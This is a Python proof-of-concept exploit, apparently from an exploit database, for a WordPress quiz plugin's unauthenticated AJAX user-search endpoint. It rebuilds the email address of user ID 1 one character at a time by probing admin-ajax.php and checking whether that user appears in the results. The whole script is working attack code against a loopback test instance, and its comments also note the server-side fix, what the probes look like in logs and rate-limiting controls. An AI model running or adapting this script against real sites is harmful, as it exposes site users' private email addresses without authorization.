## https://sploitus.com/exploit?id=WPEX-ID:C62BE802-E91A-4BCF-990D-8FD8EF7C9A28
import string
import requests
# Seed for the reconstruction: every address contains '@', so the search
# string starts there and is grown one character at a time.
email = '@'
# Characters tried at each position: lowercase letters, digits, then '-_.'.
letter_candidates = ''.join((string.ascii_lowercase, string.digits, '-_.'))
# WordPress user ID whose presence in the search results is the yes/no signal.
id_to_find = 1
# Search endpoint of a local test instance (loopback, port 8001). The search
# term is appended directly after 'search='.
base_url = 'http://127.0.0.1:8001/wp-admin/admin-ajax.php?action=ays_quiz_author_user_search&search='
# Rebuild the part of the address that follows '@'.
#
# Each request asks the search endpoint for users matching the current string
# plus one candidate character. When user `id_to_find` appears in 'results',
# the candidate is kept. Presumably the plugin matches the search term against
# the stored e-mail address; the response format is taken from this script,
# not from plugin source.
#
# The requests carry no cookie or nonce, so the handler appears to answer
# without authenticating the caller. On the server side the fix belongs in the
# AJAX handler (capability check and nonce before running the user search).
# In access logs the pattern is a run of GETs to admin-ajax.php whose 'search'
# value grows by one character per hit.
suffix_grew = True
while suffix_grew:
    print("current email", email)
    suffix_grew = False
    for candidate in letter_candidates:
        probe = email + candidate
        payload = requests.get(base_url + probe).json()
        returned_ids = [entry['id'] for entry in payload['results']]
        if id_to_find in returned_ids:
            # Target user still matches: accept the character and start over.
            email = probe
            suffix_grew = True
            break
    # No candidate matched: suffix_grew stays False and the loop ends.
# Rebuild the part of the address that precedes '@'.
#
# Candidates are now prepended to the string recovered so far. A candidate is
# kept when user `id_to_find` is still listed in the endpoint's 'results'.
# The loop stops once no candidate extends the match, which this script treats
# as having reached the start of the address.
#
# Every probe is an unauthenticated-looking GET (no cookie, no nonce) to
# admin-ajax.php. Rate limiting and alerting on many near-identical 'search'
# values from one client are reasonable compensating controls until the
# handler itself enforces a capability check.
prefix_grew = True
while prefix_grew:
    print("current email", email)
    prefix_grew = False
    for candidate in letter_candidates:
        probe = candidate + email
        payload = requests.get(base_url + probe).json()
        returned_ids = [entry['id'] for entry in payload['results']]
        if id_to_find in returned_ids:
            # Target user still matches: accept the character and start over.
            email = probe
            prefix_grew = True
            break
    # No candidate matched: prefix_grew stays False and the loop ends.